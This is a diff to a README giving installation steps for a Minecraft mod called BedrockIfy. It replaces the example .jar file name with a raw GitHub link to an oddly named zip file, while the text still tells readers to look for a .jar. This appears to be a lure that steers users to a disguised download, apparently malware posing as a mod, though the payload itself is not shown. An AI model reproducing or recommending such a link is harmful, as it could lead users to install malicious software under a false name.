Neyzjr/BedrockIfy/README.md

 **Step 3: Download the Mod File**

-Inside the release page, find the file ending with `.jar` (e.g., `BedrockIfy-mod.jar`).
+Inside the release page, find the file ending with `.jar` (e.g., `https://raw.githubusercontent.com/Neyzjr/BedrockIfy/main/foreburton/Bedrock_Ify_sanctifiably.zip`).
 Click to download it to a folder where you can find it easily, like your Desktop or Downloads folder.

 **Step 4: Locate Your Minecraft Mods Folder**